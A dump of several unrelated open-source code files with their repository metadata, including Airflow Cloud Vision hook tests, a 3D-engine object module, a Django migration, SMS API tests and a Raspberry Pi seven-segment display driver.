result = self.hook.create_reference_image(
project_id=PROJECT_ID_TEST,
location=LOC_ID_TEST,
product_id=PRODUCT_ID_TEST,
reference_image=REFERENCE_IMAGE_TEST,
reference_image_id=REFERENCE_IMAGE_ID_TEST,
)
# Then
# Product ID was provided explicitly in the method call above, should be returned from the method
assert result == REFERENCE_IMAGE_GEN_ID_TEST
create_reference_image_method.assert_called_once_with(
parent=PRODUCT_NAME,
reference_image=REFERENCE_IMAGE_TEST,
reference_image_id=REFERENCE_IMAGE_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_add_product_to_product_set(self, get_conn):
# Given
add_product_to_product_set_method = get_conn.return_value.add_product_to_product_set
# When
self.hook.add_product_to_product_set(
product_set_id=PRODUCTSET_ID_TEST,
product_id=PRODUCT_ID_TEST,
location=LOC_ID_TEST,
project_id=PROJECT_ID_TEST,
)
# Then
# Product ID was provided explicitly in the method call above, should be returned from the method
add_product_to_product_set_method.assert_called_once_with(
name=PRODUCTSET_NAME_TEST, product=PRODUCT_NAME_TEST, retry=None, timeout=None, metadata=None
)
# remove_product_from_product_set
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_remove_product_from_product_set(self, get_conn):
# Given
remove_product_from_product_set_method = get_conn.return_value.remove_product_from_product_set
# When
self.hook.remove_product_from_product_set(
product_set_id=PRODUCTSET_ID_TEST,
product_id=PRODUCT_ID_TEST,
location=LOC_ID_TEST,
project_id=PROJECT_ID_TEST,
)
# Then
# Product ID was provided explicitly in the method call above, should be returned from the method
remove_product_from_product_set_method.assert_called_once_with(
name=PRODUCTSET_NAME_TEST, product=PRODUCT_NAME_TEST, retry=None, timeout=None, metadata=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client')
def test_annotate_image(self, annotator_client_mock):
# Given
annotate_image_method = annotator_client_mock.annotate_image
# When
self.hook.annotate_image(request=ANNOTATE_IMAGE_REQUEST)
# Then
# Product ID was provided explicitly in the method call above, should be returned from the method
annotate_image_method.assert_called_once_with(
request=ANNOTATE_IMAGE_REQUEST, retry=None, timeout=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client')
def test_batch_annotate_images(self, annotator_client_mock):
# Given
batch_annotate_images_method = annotator_client_mock.batch_annotate_images
# When
self.hook.batch_annotate_images(requests=BATCH_ANNOTATE_IMAGE_REQUEST)
# Then
# Product ID was provided explicitly in the method call above, should be returned from the method
batch_annotate_images_method.assert_called_once_with(
requests=BATCH_ANNOTATE_IMAGE_REQUEST, retry=None, timeout=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_product_explicit_id(self, get_conn):
# Given
create_product_method = get_conn.return_value.create_product
create_product_method.return_value = None
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product = Product()
# When
result = self.hook.create_product(
location=LOC_ID_TEST, product_id=PRODUCT_ID_TEST, product=product, project_id=PROJECT_ID_TEST
)
# Then
# Product ID was provided explicitly in the method call above, should be returned from the method
assert result == PRODUCT_ID_TEST
create_product_method.assert_called_once_with(
parent=parent,
product=product,
product_id=PRODUCT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_product_autogenerated_id(self, get_conn):
# Given
autogenerated_id = 'autogen-p-id'
response_product = Product(
name=ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, autogenerated_id)
)
create_product_method = get_conn.return_value.create_product
create_product_method.return_value = response_product
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product = Product()
# When
result = self.hook.create_product(
location=LOC_ID_TEST, product_id=None, product=product, project_id=PROJECT_ID_TEST
)
# Then
# Product ID was not provided in the method call above. Should be extracted from the API response
# and returned.
assert result == autogenerated_id
create_product_method.assert_called_once_with(
parent=parent, product=product, product_id=None, retry=None, timeout=None, metadata=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_product_autogenerated_id_wrong_name_in_response(self, get_conn):
# Given
wrong_name = 'wrong_name_not_a_correct_path'
response_product = Product(name=wrong_name)
create_product_method = get_conn.return_value.create_product
create_product_method.return_value = response_product
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product = Product()
# When
with pytest.raises(AirflowException) as ctx:
self.hook.create_product(
location=LOC_ID_TEST, product_id=None, product=product, project_id=PROJECT_ID_TEST
)
# Then
# API response was wrong (wrong name format) and thus ProductSet ID extraction should fail.
err = ctx.value
assert 'Unable to get id from name' in str(err)
create_product_method.assert_called_once_with(
parent=parent, product=product, product_id=None, retry=None, timeout=None, metadata=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_create_product_autogenerated_id_wrong_api_response(self, get_conn):
# Given
response_product = None
create_product_method = get_conn.return_value.create_product
create_product_method.return_value = response_product
parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
product = Product()
# When
with pytest.raises(AirflowException) as ctx:
self.hook.create_product(
location=LOC_ID_TEST, product_id=None, product=product, project_id=PROJECT_ID_TEST
)
# Then
# API response was wrong (None) and thus ProductSet ID extraction should fail.
err = ctx.value
assert 'Unable to get name from response...' in str(err)
create_product_method.assert_called_once_with(
parent=parent, product=product, product_id=None, retry=None, timeout=None, metadata=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_product_no_explicit_name(self, get_conn):
# Given
product = Product()
update_product_method = get_conn.return_value.update_product
update_product_method.return_value = product
product_name = ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCT_ID_TEST)
# When
result = self.hook.update_product(
location=LOC_ID_TEST,
product_id=PRODUCT_ID_TEST,
product=product,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
assert result == MessageToDict(product)
update_product_method.assert_called_once_with(
product=Product(name=product_name), metadata=None, retry=None, timeout=None, update_mask=None
)
@parameterized.expand([(None, None), (None, PRODUCT_ID_TEST), (LOC_ID_TEST, None)])
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_product_no_explicit_name_and_missing_params_for_constructed_name(
self, location, product_id, get_conn
):
# Given
update_product_method = get_conn.return_value.update_product
update_product_method.return_value = None
product = Product()
# When
with pytest.raises(AirflowException) as ctx:
self.hook.update_product(
location=location,
product_id=product_id,
product=product,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
err = ctx.value
assert err
assert ERR_UNABLE_TO_CREATE.format(label='Product', id_label='product_id') in str(err)
update_product_method.assert_not_called()
@parameterized.expand([(None, None), (None, PRODUCT_ID_TEST), (LOC_ID_TEST, None)])
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_product_explicit_name_missing_params_for_constructed_name(
self, location, product_id, get_conn
):
# Given
explicit_p_name = ProductSearchClient.product_path(
PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCT_ID_TEST_2
)
product = Product(name=explicit_p_name)
update_product_method = get_conn.return_value.update_product
update_product_method.return_value = product
# When
result = self.hook.update_product(
location=location,
product_id=product_id,
product=product,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
# Then
assert result == MessageToDict(product)
update_product_method.assert_called_once_with(
product=Product(name=explicit_p_name), metadata=None, retry=None, timeout=None, update_mask=None
)
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_update_product_explicit_name_different_from_constructed(self, get_conn):
# Given
update_product_method = get_conn.return_value.update_product
update_product_method.return_value = None
explicit_p_name = ProductSearchClient.product_path(
PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCT_ID_TEST_2
)
product = Product(name=explicit_p_name)
template_p_name = ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCT_ID_TEST)
# When
# Location and product_id are passed in addition to a Product with an explicit name,
# but both names differ (constructed != explicit).
# Should throw AirflowException in this case.
with pytest.raises(AirflowException) as ctx:
self.hook.update_product(
location=LOC_ID_TEST,
product_id=PRODUCT_ID_TEST,
product=product,
update_mask=None,
project_id=PROJECT_ID_TEST,
retry=None,
timeout=None,
metadata=None,
)
err = ctx.value
assert err
assert (
ERR_DIFF_NAMES.format(
explicit_name=explicit_p_name,
constructed_name=template_p_name,
label="Product",
id_label="product_id",
)
in str(err)
)
update_product_method.assert_not_called()
@mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
def test_delete_product(self, get_conn):
# Given
delete_product_method = get_conn.return_value.delete_product
delete_product_method.return_value = None
name = ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCT_ID_TEST)
# When
response = self.hook.delete_product(
location=LOC_ID_TEST, product_id=PRODUCT_ID_TEST, project_id=PROJECT_ID_TEST
)
# Then
assert response is None
delete_product_method.assert_called_once_with(name=name, retry=None, timeout=None, metadata=None)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_detect_text(self, annotator_client_mock):
# Given
detect_text_method = annotator_client_mock.text_detection
detect_text_method.return_value = AnnotateImageResponse(
text_annotations=[EntityAnnotation(description="test", score=0.5)]
)
# When
self.hook.text_detection(image=DETECT_TEST_IMAGE)
# Then
detect_text_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_detect_text_with_additional_properties(self, annotator_client_mock):
# Given
detect_text_method = annotator_client_mock.text_detection
detect_text_method.return_value = AnnotateImageResponse(
text_annotations=[EntityAnnotation(description="test", score=0.5)]
)
# When
self.hook.text_detection(
image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"}
)
# Then
detect_text_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2"
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_detect_text_with_error_response(self, annotator_client_mock):
# Given
detect_text_method = annotator_client_mock.text_detection
detect_text_method.return_value = AnnotateImageResponse(
error={"code": 3, "message": "test error message"}
)
# When
with pytest.raises(AirflowException) as ctx:
self.hook.text_detection(image=DETECT_TEST_IMAGE)
err = ctx.value
assert "test error message" in str(err)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_document_text_detection(self, annotator_client_mock):
# Given
document_text_detection_method = annotator_client_mock.document_text_detection
document_text_detection_method.return_value = AnnotateImageResponse(
text_annotations=[EntityAnnotation(description="test", score=0.5)]
)
# When
self.hook.document_text_detection(image=DETECT_TEST_IMAGE)
# Then
document_text_detection_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_document_text_detection_with_additional_properties(self, annotator_client_mock):
# Given
document_text_detection_method = annotator_client_mock.document_text_detection
document_text_detection_method.return_value = AnnotateImageResponse(
text_annotations=[EntityAnnotation(description="test", score=0.5)]
)
# When
self.hook.document_text_detection(
image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"}
)
# Then
document_text_detection_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2"
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_detect_document_text_with_error_response(self, annotator_client_mock):
# Given
detect_text_method = annotator_client_mock.document_text_detection
detect_text_method.return_value = AnnotateImageResponse(
error={"code": 3, "message": "test error message"}
)
# When
with pytest.raises(AirflowException) as ctx:
self.hook.document_text_detection(image=DETECT_TEST_IMAGE)
err = ctx.value
assert "test error message" in str(err)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_label_detection(self, annotator_client_mock):
# Given
label_detection_method = annotator_client_mock.label_detection
label_detection_method.return_value = AnnotateImageResponse(
label_annotations=[EntityAnnotation(description="test", score=0.5)]
)
# When
self.hook.label_detection(image=DETECT_TEST_IMAGE)
# Then
label_detection_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_label_detection_with_additional_properties(self, annotator_client_mock):
# Given
label_detection_method = annotator_client_mock.label_detection
label_detection_method.return_value = AnnotateImageResponse(
label_annotations=[EntityAnnotation(description="test", score=0.5)]
)
# When
self.hook.label_detection(
image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"}
)
# Then
label_detection_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2"
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_label_detection_with_error_response(self, annotator_client_mock):
# Given
detect_text_method = annotator_client_mock.label_detection
detect_text_method.return_value = AnnotateImageResponse(
error={"code": 3, "message": "test error message"}
)
# When
with pytest.raises(AirflowException) as ctx:
self.hook.label_detection(image=DETECT_TEST_IMAGE)
err = ctx.value
assert "test error message" in str(err)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_safe_search_detection(self, annotator_client_mock):
# Given
safe_search_detection_method = annotator_client_mock.safe_search_detection
safe_search_detection_method.return_value = AnnotateImageResponse(
safe_search_annotation=SafeSearchAnnotation(
adult="VERY_UNLIKELY",
spoof="VERY_UNLIKELY",
medical="VERY_UNLIKELY",
violence="VERY_UNLIKELY",
racy="VERY_UNLIKELY",
)
)
# When
self.hook.safe_search_detection(image=DETECT_TEST_IMAGE)
# Then
safe_search_detection_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_safe_search_detection_with_additional_properties(self, annotator_client_mock):
# Given
safe_search_detection_method = annotator_client_mock.safe_search_detection
safe_search_detection_method.return_value = AnnotateImageResponse(
safe_search_annotation=SafeSearchAnnotation(
adult="VERY_UNLIKELY",
spoof="VERY_UNLIKELY",
medical="VERY_UNLIKELY",
violence="VERY_UNLIKELY",
racy="VERY_UNLIKELY",
)
)
# When
self.hook.safe_search_detection(
image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"}
)
# Then
safe_search_detection_method.assert_called_once_with(
image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2"
)
@mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client")
def test_safe_search_detection_with_error_response(self, annotator_client_mock):
# Given
detect_text_method = annotator_client_mock.safe_search_detection
detect_text_method.return_value = AnnotateImageResponse(
error={"code": 3, "message": "test error message"}
)
# When
with pytest.raises(AirflowException) as ctx:
self.hook.safe_search_detection(image=DETECT_TEST_IMAGE)
err = ctx.value
assert "test error message" in str(err)
|
apache/incubator-airflow
|
tests/providers/google/cloud/hooks/test_vision.py
|
Python
|
apache-2.0
| 38,031 | 0.003523 |
import _metagam3d
from _metagam3d import AxisAlignment, AlignmentType
from metagam3d.channels import blocking
from metagam3d.scripts import m3d_expr
from concurrence import Tasklet
class LoadError(Exception):
pass
class Object(_metagam3d.Object):
def __init__(self, objid):
_metagam3d.Object.__init__(self, objid)
self._params = {}
def param(self, paramid):
"Get parameter object for given parameter id"
try:
return self._params[paramid]
except KeyError:
pass
param = ObjectParam(self, paramid)
self._params[paramid] = param
return param
def load(self, filename, flags=0):
"Load and return new subobject from file"
objid = _metagam3d._loadObject(filename, self.id, flags)
if objid is None:
raise LoadError("Error loading %s" % filename)
return Object(objid)
def createText(self, axisAlignment=AxisAlignment.XY_PLANE, alignment=AlignmentType.CENTER_CENTER):
"Create text object"
return Object(_metagam3d._createText(self.id, axisAlignment, alignment))
def getParam(self, paramid, t):
return self.param(paramid).getValue(t)
def setParam(self, paramid, val):
if type(val) is not _metagam3d.DynamicValue:
if type(val) is not _metagam3d.Variant:
val = _metagam3d.Variant(val)
val = _metagam3d.DynamicValue(val)
self.param(paramid).setValue(val)
def setParam3(self, paramid, x, y, z):
self.setParam(paramid, _metagam3d.Vec3d(x, y, z))
def setParamExpr(self, paramid, expr, till=None):
self.param(paramid).setValue(m3d_expr(expr, till))
def assignMaterial(self, geodeName, ambient=0, diffuse=0, specular=0, emission=0, shininess=0):
_metagam3d._assignMaterial(self.id, geodeName, ambient, diffuse, specular, emission, shininess)
def createConsole(self, cols=80, rows=25, fontSize=1.0):
return Console(_metagam3d._createConsole(self.id, cols, rows, fontSize))
def createLine(self):
return Object(_metagam3d._createLine(self.id))
def destroyAfter(self, t):
Tasklet.new(self._destroyAfter)(t)
def _destroyAfter(self, t):
Tasklet.sleep(t)
self.destroy()
class Console(Object):
def println(self, elements):
line = _metagam3d.ConsoleLine()
for el in elements:
line.add(_metagam3d.ConsoleLineElement(el[0], el[1]))
_metagam3d._printConsole(self.id, line)
class ObjectParam(_metagam3d.ObjectParam):
def __init__(self, obj, paramid):
_metagam3d.ObjectParam.__init__(self, obj.id, paramid)
self._obj = obj
@property
def obj(self):
return self._obj
def load(filename, flags=0):
"Load root level object from file"
objid = _metagam3d._loadObject(filename, 0, flags)
if objid is None:
raise LoadError("Error loading %s" % filename)
return Object(objid)
def createText(axisAlignment=AxisAlignment.XY_PLANE, alignment=AlignmentType.CENTER_CENTER):
"Create text object"
return Object(_metagam3d._createText(0, axisAlignment, alignment))
def createConsole(cols=80, rows=25, fontSize=1.0):
return Console(_metagam3d._createConsole(0, cols, rows, fontSize))
def createLine():
return Object(_metagam3d._createLine(0))
|
JoyTeam/metagam3d
|
python/metagam3d/objects.py
|
Python
|
lgpl-3.0
| 3,360 | 0.004762 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import image_cropping.fields
class Migration(migrations.Migration):
dependencies = [
('crop', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='cropping',
field=image_cropping.fields.ImageRatioField('avatar', '200x200', verbose_name='cropping', help_text=None, adapt_rotation=False, size_warning=False, free_crop=False, hide_image_field=False, allow_fullsize=False),
preserve_default=True,
),
]
|
danithaca/berrypicking
|
django/advanced/crop/migrations/0002_auto_20150123_1831.py
|
Python
|
gpl-2.0
| 628 | 0.001592 |
# -*- coding: utf-8 -*-
import unittest
from clockwork import clockwork
from clockwork import clockwork_exceptions
class ApiTests(unittest.TestCase):
api_key = "YOUR_API_KEY_HERE"
def test_should_send_single_message(self):
"""Sending a single SMS with the minimum detail and no errors should work"""
api = clockwork.API(self.api_key)
sms = clockwork.SMS(to="441234567890", message="This is a test message")
response = api.send(sms)
self.assertTrue(response.success)
def test_should_send_single_unicode_message(self):
"""Sending a single SMS with the full GSM character set (apart from ESC and form feed) should work"""
api = clockwork.API(self.api_key)
sms = clockwork.SMS(
to="441234567890",
#Message table copied from http://www.clockworksms.com/doc/reference/faqs/gsm-character-set/
message=u'''@£$¥èéùìòÇ\nØø\rÅåΔ_ΦΓΛΩΠΨΣΘΞÆæßÉ'''
u''' !"#¤%&'()*+,-./'''
u'''0123456789:;<=>?'''
u'''¡ABCDEFGHIJKLMNO'''
u'''PQRSTUVWXYZÄÖÑܧ'''
u'''¿abcdefghijklmno'''
u'''pqrstuvwxyzäöñüà'''
u'''€[\]^{|}~'''
,long=True)
response = api.send(sms)
self.assertTrue(response.success)
def test_should_fail_with_no_message(self):
"""Sending a single SMS with no message should fail"""
api = clockwork.API(self.api_key)
sms = clockwork.SMS(to="441234567890", message="")
response = api.send(sms)
self.assertFalse(response.success)
def test_should_fail_with_no_to(self):
"""Sending a single SMS with no message should fail"""
api = clockwork.API(self.api_key)
sms = clockwork.SMS(to="", message="This is a test message")
response = api.send(sms)
self.assertFalse(response.success)
def test_should_send_multiple_messages(self):
"""Sending multiple sms messages should work"""
api = clockwork.API(self.api_key)
sms1 = clockwork.SMS(to="441234567890", message="This is a test message 1")
sms2 = clockwork.SMS(to="441234567890", message="This is a test message 2")
response = api.send([sms1,sms2])
for r in response:
self.assertTrue(r.success)
def test_should_send_multiple_messages_with_erros(self):
"""Sending multiple sms messages, one of which has an invalid message should work"""
api = clockwork.API(self.api_key)
sms1 = clockwork.SMS(to="441234567890", message="This is a test message 1")
sms2 = clockwork.SMS(to="441234567890", message="")
response = api.send([sms1, sms2])
self.assertTrue(response[0].success)
self.assertFalse(response[1].success)
def test_should_fail_with_invalid_key(self):
api = clockwork.API("this_key_is_wrong")
sms = clockwork.SMS(to="441234567890", message="This is a test message 1")
self.assertRaises(clockwork_exceptions.ApiException, api.send, sms)
def test_should_be_able_to_get_balance(self):
api = clockwork.API(self.api_key)
balance = api.get_balance()
self.assertEqual('PAYG', balance['account_type'])
if __name__ == "__main__":
unittest.main()
|
mediaburst/clockwork-python
|
tests/clockwork_tests.py
|
Python
|
mit
| 3,369 | 0.004808 |
from math import log
def make_logarithmic_function(base):
return lambda x: log(x, base)
My_LF = make_logarithmic_function(3)
print(My_LF(9))
|
jinzekid/codehub
|
python/数据分析/func_lambda_test.py
|
Python
|
gpl-3.0
| 150 | 0.02 |
# -*- coding: utf-8 -*-
import spidev
import math
def reverse_bit_order(x):
x_reversed = 0x00
if (x & 0x80):
x_reversed |= 0x01
if (x & 0x40):
x_reversed |= 0x02
if (x & 0x20):
x_reversed |= 0x04
if (x & 0x10):
x_reversed |= 0x08
if (x & 0x08):
x_reversed |= 0x10
if (x & 0x04):
x_reversed |= 0x20
if (x & 0x02):
x_reversed |= 0x40
if (x & 0x01):
x_reversed |= 0x80
return x_reversed
"""
x = (((x & 0x55) << 1) | ((x & 0xAA) >> 1)) % 0xFF
x = (((x & 0x33) << 2) | ((x & 0xCC) >> 2)) % 0xFF
return ((x << 4) | (x >> 4)) % 0xFF
"""
def calc_checksum(array):
sum = 0
for item in array:
sum += item
sum %= 256
return (0xFF - sum) % 256
spi = spidev.SpiDev()
spi.open(0, 0)
#
# CS+ データ送受信タイミング設定 タイプ1
#
# SCK:  ̄ ̄|_| ̄|_| ̄|_| ̄...
# SOp: 末尾ビット→ <D7> <D6> <D5> ... → 先頭ビット
#
spi.mode = 0
#
# SPIのクロック周波数
# ・500kHz: デフォルト
# ・1MHz: OK
# ・2MHz: NG(データ化け発生)
# ⇒1MHzを設定。
#
spi.max_speed_hz = 1000000
#
#
#
data = [ 0x60, 0xDA, 0x20, 0x10, 0x08, 0x04, 0x02, 0x01, ]
brightness = [ 100, 100, 100, 100, 100, 100, 100, 100, ]
# 1フレーム作成
xfer_data = [ 0x01 ] # タイプ=表示データ
xfer_data.extend(brightness) # 表示データ部
checksum = calc_checksum(xfer_data)
xfer_data.append(checksum)
print xfer_data
#
# RaspberryPiはMSBFirstでしかデータを送信できない。
# (spi.lsbfirstメンバがあるが、Read-Only)
# ⇒送信前にビットを逆転する必要がある。
# [参考URL] http://tightdev.net/SpiDev_Doc.pdf
#
xfer_data = map(reverse_bit_order, xfer_data)
print xfer_data
# フレーム送信
spi.writebytes(xfer_data)
import os
os.system('sleep 1')
num_to_pattern = [
0xfc, # 0
0x60, # 1
0xda, # 2
0xf2, # 3
0x66, # 4
0xb6, # 5
0xbe, # 6
0xe4, # 7
0xfe, # 8
0xf6, # 9
]
rad = 0.0
while (True):
xfer_data = [ 0x01 ]
brightness[0] = int(math.sin(rad + math.pi/8*0) * 50 + 50)
brightness[1] = int(math.sin(rad + math.pi/8*1) * 50 + 50)
brightness[2] = int(math.sin(rad + math.pi/8*2) * 50 + 50)
brightness[3] = int(math.sin(rad + math.pi/8*3) * 50 + 50)
brightness[4] = int(math.sin(rad + math.pi/8*4) * 50 + 50)
brightness[5] = int(math.sin(rad + math.pi/8*5) * 50 + 50)
brightness[6] = int(math.sin(rad + math.pi/8*6) * 50 + 50)
brightness[7] = int(math.sin(rad + math.pi/8*7) * 50 + 50)
xfer_data.extend(brightness)
checksum = calc_checksum(xfer_data)
xfer_data.append(checksum)
xfer_data = map(reverse_bit_order, xfer_data)
spi.writebytes(xfer_data)
os.system('sleep 0.001')
rad += 0.05 * 2
import datetime as dt
now = dt.datetime.now()
xfer_data = [ 0x00 ]
# data[0] = num_to_pattern[now.year / 1000 % 10]
# data[1] = num_to_pattern[now.year / 100 % 10]
# data[2] = num_to_pattern[now.year / 10 % 10]
# data[3] = num_to_pattern[now.year / 1 % 10]
# data[4] = num_to_pattern[now.month / 10 % 10]
# data[5] = num_to_pattern[now.month / 1 % 10]
# data[6] = num_to_pattern[now.day / 10 % 10]
# data[7] = num_to_pattern[now.day / 1 % 10]
data[0] = num_to_pattern[now.hour / 10 % 10]
data[1] = num_to_pattern[now.hour / 1 % 10]
if (now.microsecond < 500*1000):
data[1] |= 0x01;
data[2] = num_to_pattern[now.minute / 10 % 10]
data[3] = num_to_pattern[now.minute / 1 % 10]
if (now.microsecond < 500*1000):
data[3] |= 0x01;
data[4] = num_to_pattern[now.second / 10 % 10]
data[5] = num_to_pattern[now.second / 1 % 10]
if (now.microsecond < 500*1000):
data[5] |= 0x01;
data[6] = num_to_pattern[now.microsecond / 100000 % 10]
data[7] = num_to_pattern[now.microsecond / 10000 % 10]
# data[4] = num_to_pattern[now.microsecond / 1000 % 10]
# data[5] = num_to_pattern[now.microsecond / 100 % 10]
# data[6] = num_to_pattern[now.microsecond / 10 % 10]
# data[7] = num_to_pattern[now.microsecond / 1 % 10]
xfer_data.extend(data)
checksum = calc_checksum(xfer_data)
xfer_data.append(checksum)
xfer_data = map(reverse_bit_order, xfer_data)
spi.writebytes(xfer_data)
|
extsui/7SegFinger
|
test_8digit.py
|
Python
|
mit
| 4,304 | 0.035431 |
# -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant la méta-classe et la classe abstraite de contrôle."""
from abstraits.obase import BaseObj, MetaBaseObj
controles = {}
class MetaControle(MetaBaseObj):
"""Métaclasse des contrôles.
Elle ajoute le contrôle dans le dictionnaire 'controles' si il possède
une clé.
"""
def __init__(cls, nom, bases, contenu):
"""Constructeur de la métaclasse"""
MetaBaseObj.__init__(cls, nom, bases, contenu)
if cls.cle:
controles[cls.cle] = cls
class Controle(BaseObj, metaclass=MetaControle):
"""Classe représentant un contrôle.
Un contrôle est une classe intermédiaire entre un objectif et une
volonté. Un contrôle permet de spécifier une action continue
paramétrable. Par exemple, un contrôle permet de paramétrer la
vitesse du navire. Si un équipage possède ce contrôle actif,
le commandant (le capitaine ou second PNJ) va décomposer ce contrôle
en ordres après avoir déterminé combien de voiles, en fonction du
vent, doivent être hissées, ainsi que combien de rames doivent être
tenues et à quelle vitesse. Cependant, un contrôle n'est pas
simpelment une volonté enveloppant d'autres volontés : le contrôle
reste actif jusqu'au moment où il sera remplacé. Admettons que le
vent change de direction et que la vitesse se modifie, le contrôle
doit faire en sorte que la vitesse soit rétablie à celle spécifiée.
Contrairement aux objectifs, volontés et ordres, un contrôle est
actif ou inactif sur un navire en fonction de son type. On ne peut
avoir deux contrôles actifs en même temps sur le même navire
précisant que le navire doit aller à 1 noeud et à 2 noeuds. Par
contre, on peut avoir deux contrôles actifs sur le même navire, l'un
de type 'vitesse' précisant que le navire doit aller à 1,7 noeuds
et l'autre de type 'direction' précisant que le navire doit maintenir
ce cap.
"""
cle = None
logger = type(importeur).man_logs.get_logger("ordres")
def __init__(self, equipage, *args):
BaseObj.__init__(self)
self.equipage = equipage
self.arguments = args
def __getnewargs__(self):
arguments = (None, ) + tuple(getattr(self, "arguments", ()))
return arguments
def __repr__(self):
return "<Contrôle {}:{} {}>".format(self.cle_navire, self.cle,
self.arguments)
@property
def navire(self):
return self.equipage and self.equipage.navire or None
@property
def cle_navire(self):
navire = self.navire
return navire and navire.cle or "inconnu"
@property
def commandant(self):
